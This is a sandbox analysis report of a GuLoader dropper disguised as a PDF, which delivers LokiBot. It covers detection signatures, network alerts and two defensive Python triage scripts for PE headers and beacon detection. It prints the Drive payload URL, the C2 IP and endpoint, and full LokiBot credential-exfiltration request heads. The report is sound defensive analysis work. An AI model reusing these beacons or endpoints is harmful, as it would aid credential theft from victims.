Windows Analysis Report RFQ 001030112021#U00b7pdf.exe

Overview

General Information

Sample Name: RFQ 001030112021#U00b7pdf.exe (the sandbox writes non-ASCII filename characters as #Uxxxx; #U00b7 is U+00B7, a middle dot, so the lure displays as "RFQ 001030112021·pdf.exe", a fake .pdf extension on an .exe)
Analysis ID: 531794
MD5: 754fa9ff30ec6e1cd7a29837adeb7a8b
SHA1: 09472c720424ab26d13b7dd8cc2e199a826a88d1
SHA256: 957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Found malware configuration
Source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1f5uP"} (the Drive file ID is truncated here; the full ID, 1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb, appears in the observed GET request to drive.google.com under Networking)
Multi AV Scanner detection for submitted file
Source: RFQ 001030112021#U00b7pdf.exe Metadefender: Detection: 17%
Source: RFQ 001030112021#U00b7pdf.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for domain / URL
Source: http://63.250.34.171/tickets.php?id=277 Virustotal: Detection: 8%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 0.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.0.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.2.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.1.unpack Avira: Label: TR/Dropper.VB.Gen
Source: 8.0.RFQ 001030112021#U00b7pdf.exe.400000.3.unpack Avira: Label: TR/Dropper.VB.Gen

Compliance:

Uses 32bit PE files
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2
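
The "Static PE information" line above lists the sample's COFF Characteristics flags, and the "PE / OLE file has an invalid certificate" signature, together with the DigiCert CRL, OCSP and timestamping URLs found in the file's strings, is consistent with an embedded Authenticode blob that does not verify. The following Python is an added example and is not part of the Joe Sandbox report: it decodes the Characteristics bits and follows the security data directory to the WIN_CERTIFICATE structure, so both observations can be reproduced offline on any PE. The image it parses is constructed in build_sample_pe(); the Characteristics value 0x010F is an assumption chosen because it yields exactly the five flags listed above (the report does not print the raw value). Presence of a certificate blob says nothing about validity; chain and timestamp verification is a job for signtool verify /pa or osslsigncode verify.

```python
"""Static PE triage: decode COFF Characteristics and locate the Authenticode blob.
Example code added to this report; the PE image built below is constructed for
illustration and is not the analysed sample."""
import struct

# IMAGE_FILE_* characteristics bits (winnt.h).
CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x0200: "DEBUG_STRIPPED",
    0x2000: "DLL",
}
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def decode_characteristics(value: int) -> list[str]:
    """Names of the set Characteristics bits, e.g. 0x010F -> the five flags in this report."""
    return [name for bit, name in CHARACTERISTICS.items() if value & bit]


def parse_pe(data: bytes) -> dict:
    """Walk MZ -> PE signature -> COFF header -> optional header -> security directory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, _nsec, _ts, _psym, _nsym, _optsize, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:      # PE32: data directories start 96 bytes into the optional header
        ndirs_off, dirs_off = 92, 96
    elif magic == 0x20B:    # PE32+: 112 bytes
        ndirs_off, dirs_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:04X}")
    ndirs = struct.unpack_from("<I", data, opt + ndirs_off)[0]
    info = {
        "machine": machine,
        "pe32": magic == 0x10B,
        "characteristics": decode_characteristics(chars),
        "authenticode_blob": False,
        "cert_type": None,
        "cert_length": 0,
    }
    if ndirs > 4:
        # Entry 4 is IMAGE_DIRECTORY_ENTRY_SECURITY; unlike the other directories its
        # "VirtualAddress" is a raw file offset to a WIN_CERTIFICATE structure.
        cert_off, cert_size = struct.unpack_from("<II", data, opt + dirs_off + 4 * 8)
        if cert_off and cert_size >= 8 and cert_off + 8 <= len(data):
            length, _rev, ctype = struct.unpack_from("<IHH", data, cert_off)
            info.update(authenticode_blob=True, cert_type=ctype, cert_length=length)
    return info


def build_sample_pe(characteristics: int, with_cert: bool) -> bytes:
    """Constructed header-only PE32 image (no sections, no real signature) for testing."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, characteristics)  # I386, 0xE0 opt hdr
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                      # NumberOfRvaAndSizes
    image = bytes(dos) + b"PE\0\0" + coff
    if with_cert:
        cert_off = 0x40 + 4 + 20 + 0xE0                      # first byte after the headers (8-aligned)
        body = b"\x30\x82\x00\x10" + b"\x00" * 16             # placeholder, not real PKCS#7 SignedData
        cert = struct.pack("<IHH", 8 + len(body), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body
        struct.pack_into("<II", opt, 96 + 4 * 8, cert_off, len(cert))
        return image + bytes(opt) + cert
    return image + bytes(opt)


if __name__ == "__main__":
    print(parse_pe(build_sample_pe(0x010F, with_cert=True)))
```

To run it on a real file, replace the constructed image with `parse_pe(open(path, "rb").read())`; the flag list it prints should match the sandbox's Static PE information line for that file.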

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49805 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49824 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49825 -> 63.250.34.171:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49825 -> 63.250.34.171:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1f5uP (file ID truncated here; the full ID 1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb is in the observed GET request to drive.google.com)
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 63.250.34.171 63.250.34.171
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
    Cookie: CONSENT=YES+GB.en-GB+V9+BX
Source: global traffic HTTP traffic detected:
    GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-00-50-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected (three POST beacons to 63.250.34.171; the first two carried 190-byte bodies, the third 163 bytes):
    POST /tickets.php?id=277 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 63.250.34.171
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: AA495C78
    Content-Length: 190 (163 in the third request)
    Connection: close
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: global traffic HTTP traffic detected (three identical 403 responses from the Apache server at 63.250.34.171, Date: Wed, 01 Dec 2021 10:57:40, 10:57:48 and 10:57:52 GMT):
    HTTP/1.1 403 Forbidden
    Date: Wed, 01 Dec 2021 10:57:40 GMT
    Server: Apache/2.4.38 (Debian)
    Content-Length: 287
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Data Ascii (the Data Raw hex dump is the same HTML with CRLF line breaks): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>
Source: unknown TCP traffic detected without corresponding DNS query: 63.250.34.171 (reported 18 times, once per connection)
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://63.250.34.171/tickets.php?id=277
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://63.250.34.171/tickets.php?id=277N
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0C
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://ocsp.digicert.com0O
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/)
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892182668.00000000009F2000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/:
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857244757.00000000009EB000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895501429.000000001E743000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuo
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/p
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857351180.0000000000A33000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.858257850.00000000009F2000.00000004.00000001.sdmp String found in binary or memory: https://doc-00-50-docs.googleusercontent.com/t
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000003.857252328.00000000009F2000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCbJ
Source: RFQ 001030112021#U00b7pdf.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown HTTP traffic detected:
    POST /tickets.php?id=277 HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 63.250.34.171
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: AA495C78
    Content-Length: 190
    Connection: close
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: unknown HTTPS traffic detected: 142.250.180.110:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown HTTPS traffic detected: 216.58.198.33:443 -> 192.168.2.4:49796 version: TLS 1.2
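
Two things in this section deserve a closer look. First, the sandbox classifies the sample as GuLoader, but every Snort alert names LokiBot: GuLoader is the loader that fetched the second stage from Google Drive, and the POST beacons, the Charon/Inferno user agent and the credential-theft signatures listed under Signatures describe that payload. Second, the 403 responses do not mean the exfiltration failed; in an HTTP/1.0 POST the 190- and 163-byte bodies were already on the wire before the server answered. The Python below is an added example, not code from Joe Sandbox or from the Emerging Threats rule set: it parses raw HTTP request heads, flags the header-level LokiBot artifacts visible in this report, and reproduces the "TCP traffic without corresponding DNS query" check over a connection list. It approximates ET 2021641 and 2025381 at the header layer only; the real rules also inspect the binary body, and neither the report nor this code explains how the Content-Key value is derived. The request texts are copied from the report; the DNS answers and connection list are constructed and labelled as such.

```python
"""Header-level triage for the traffic in this report: LokiBot beacon artifacts and
connections to IPs that no DNS answer returned. Example code added to the report,
not Joe Sandbox or Emerging Threats code; the sample data at the bottom is constructed."""
from __future__ import annotations
from dataclasses import dataclass, field
import ipaddress

LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> HttpRequest:
    """Parse the request line and headers of a raw HTTP request (CRLF or LF line endings)."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    method, path, version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()   # header names are case-insensitive
    return HttpRequest(method, path, version, headers)


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP (optionally with :port) rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def lokibot_indicators(req: HttpRequest) -> list[str]:
    """Header-level artifacts of a LokiBot check-in/exfiltration POST as seen in this report.
    Header layer only: the ET rules additionally match the binary body, which is not parsed here."""
    h = req.headers
    hits: list[str] = []
    if h.get("user-agent") == LOKIBOT_USER_AGENT:
        hits.append("LokiBot User-Agent (Charon; Inferno)")
    if "content-key" in h:
        hits.append(f"non-standard Content-Key header ({h['content-key']})")
    if (req.method == "POST" and req.version == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("HTTP/1.0 POST of a binary octet-stream")
    if is_ip_literal(h.get("host", "")) and req.path.split("?", 1)[0].endswith(".php"):
        hits.append(f"PHP endpoint addressed by bare IP {h['host']}")
    return hits


def connections_without_dns(connections: list[tuple[str, int]],
                            dns_answers: dict[str, list[str]]) -> list[str]:
    """Destination IPs that never appeared in a DNS answer: the hard-coded C2 pattern the
    report flags as 'TCP traffic detected without corresponding DNS query'."""
    resolved = {ip for answers in dns_answers.values() for ip in answers}
    return sorted({ip for ip, _port in connections if ip not in resolved})


# --- constructed sample data: request heads copied from the report, DNS answers assumed ---
LOKIBOT_POST = (
    "POST /tickets.php?id=277 HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 63.250.34.171\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: AA495C78\r\n"
    "Content-Length: 190\r\n"
    "Connection: close\r\n\r\n"
)
DRIVE_GET = (
    "GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: drive.google.com\r\n"
    "Cache-Control: no-cache\r\n"
    "Cookie: CONSENT=YES+GB.en-GB+V9+BX\r\n\r\n"
)
CONNECTIONS = [("142.250.180.110", 443), ("216.58.198.33", 443), ("63.250.34.171", 80)]
DNS_ANSWERS = {                                   # assumed resolutions, not taken from the report
    "drive.google.com": ["142.250.180.110"],
    "doc-00-50-docs.googleusercontent.com": ["216.58.198.33"],
}


def triage() -> dict:
    """Run both checks over the sample data; the C2 POST should hit, the Drive GET should not."""
    return {
        "lokibot_post": lokibot_indicators(parse_request(LOKIBOT_POST)),
        "drive_get": lokibot_indicators(parse_request(DRIVE_GET)),
        "no_dns": connections_without_dns(CONNECTIONS, DNS_ANSWERS),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

The Drive download deliberately produces no hits: its user agent is a stock IE11 string and the host is a name, which is exactly why the GuLoader stage blends in and why the loader's payload hosting is better caught by the "non-browser process fetching from drive.google.com" angle than by the request headers alone.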

System Summary:

Potential malicious icon found
Source: initial sample Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Uses 32bit PE files
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code functions:
    0_2_0040131C, 0_2_020B2725, 0_2_020B9405, 0_2_020B1A15, 0_2_020BEA59, 0_2_020BEF41, 0_2_020B8209, 0_2_020B8215, 0_2_020B8221, 0_2_020B826D,
    0_2_020B8279, 0_2_020B8285, 0_2_020B82ED, 0_2_020B82F9, 0_2_020B8308, 0_2_020B8369, 0_2_020B83E1, 0_2_020B7009, 0_2_020B7015, 0_2_020B7021,
    0_2_020B8031, 0_2_020B8086, 0_2_020B809D, 0_2_020BA09D, 0_2_020B8091, 0_2_020B7095, 0_2_020B80A9, 0_2_020BA0B5, 0_2_020BD0C6, 0_2_020B70FD,
    0_2_020B70F1, 0_2_020B7103, 0_2_020B8105, 0_2_020BA119, 0_2_020B811D, 0_2_020B8111, 0_2_020B8129, 0_2_020BA128, 0_2_020B712C, 0_2_020B713D,
    0_2_020B7149, 0_2_020B7162, 0_2_020B81B9, 0_2_020B81C5, 0_2_020B81DD, 0_2_020B71DC, 0_2_020B81D1, 0_2_020B81F8, 0_2_020B8609, 0_2_020B760D,
    0_2_020B7619, 0_2_020B8615, 0_2_020B862D, 0_2_020B8621, 0_2_020B7625, 0_2_020B7631, 0_2_020B7664, 0_2_020B76B9, 0_2_020B76C5, 0_2_020B76DD,
    0_2_020B76D1, 0_2_020B86FC, 0_2_020B7739, 0_2_020B7745, 0_2_020B775D, 0_2_020B7751, 0_2_020B776E, 0_2_020B7790, 0_2_020B9481, 0_2_020B94CA,
    0_2_020B94C8, 0_2_020B84C5, 0_2_020B94D5, 0_2_020B94E1, 0_2_020B74FD, 0_2_020B74F1, 0_2_020B850C, 0_2_020B752E, 0_2_020B7539, 0_2_020B7545,
    0_2_020B7568, 0_2_020BB562, 0_2_020B8594, 0_2_020B85AD, 0_2_020B85A1, 0_2_020B85B9, 0_2_020B75E9, 0_2_020B9A01, 0_2_020B9A04, 0_2_020B9A1D,
    0_2_020B7A12, 0_2_020B9A11, 0_2_020B9A29, 0_2_020B9A35, 0_2_020B7A7D, 0_2_020B7A71, 0_2_020B9A75, 0_2_020B7A89, 0_2_020B9A8D, 0_2_020B9A81,
    0_2_020B7AED, 0_2_020B9B25, 0_2_020B9B3D, 0_2_020B7B4D, 0_2_020B7B41, 0_2_020B7B59, 0_2_020B9B60, 0_2_020B7B65, 0_2_020B9B7D, 0_2_020B9B71,
    0_2_020B9B89, 0_2_020BDB82, 0_2_020B9B98, 0_2_020B7BBD, 0_2_020B7BC9, 0_2_020B9BDA, 0_2_020B7BD5, 0_2_020B7BE1, 0_2_020B9BE5, 0_2_020B9BFD,
    0_2_020B9BF1, 0_2_020B782D, 0_2_020BD872, 0_2_020B7880, 0_2_020B7899, 0_2_020B78A5, 0_2_020B98DD, 0_2_020B7915, 0_2_020B792D, 0_2_020B7921,
    0_2_020B9979, 0_2_020B799D, 0_2_020B7991
    All but the first of these hits lie in the 0x020B0000 region, the same mapped region the GuLoader configuration was extracted from (see AV Detection), and many are only a few bytes apart (0_2_020B8209, 0_2_020B8215, 0_2_020B8221). That is the pattern of the loader's call/push/ret obfuscated code listed under Signatures rather than of 133 distinct cryptographic routines, so treat this heuristic as weak evidence on its own.
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9991 0_2_020B9991
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B79A9 0_2_020B79A9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99BD 0_2_020B99BD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99DD 0_2_020B99DD
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99D0 0_2_020B99D0
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99E9 0_2_020B99E9
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B99F5 0_2_020B99F5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E40 0_2_020B7E40
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E47 0_2_020B7E47
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E59 0_2_020B7E59
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E65 0_2_020B7E65
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7E79 0_2_020B7E79
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7EC2 0_2_020B7EC2
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F3D 0_2_020B7F3D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F31 0_2_020B7F31
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6F8A 0_2_020B6F8A
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7F81 0_2_020B7F81
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6F95 0_2_020B6F95
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B6FA1 0_2_020B6FA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7FA5 0_2_020B7FA5
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9C09 0_2_020B9C09
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B7C3D 0_2_020B7C3D
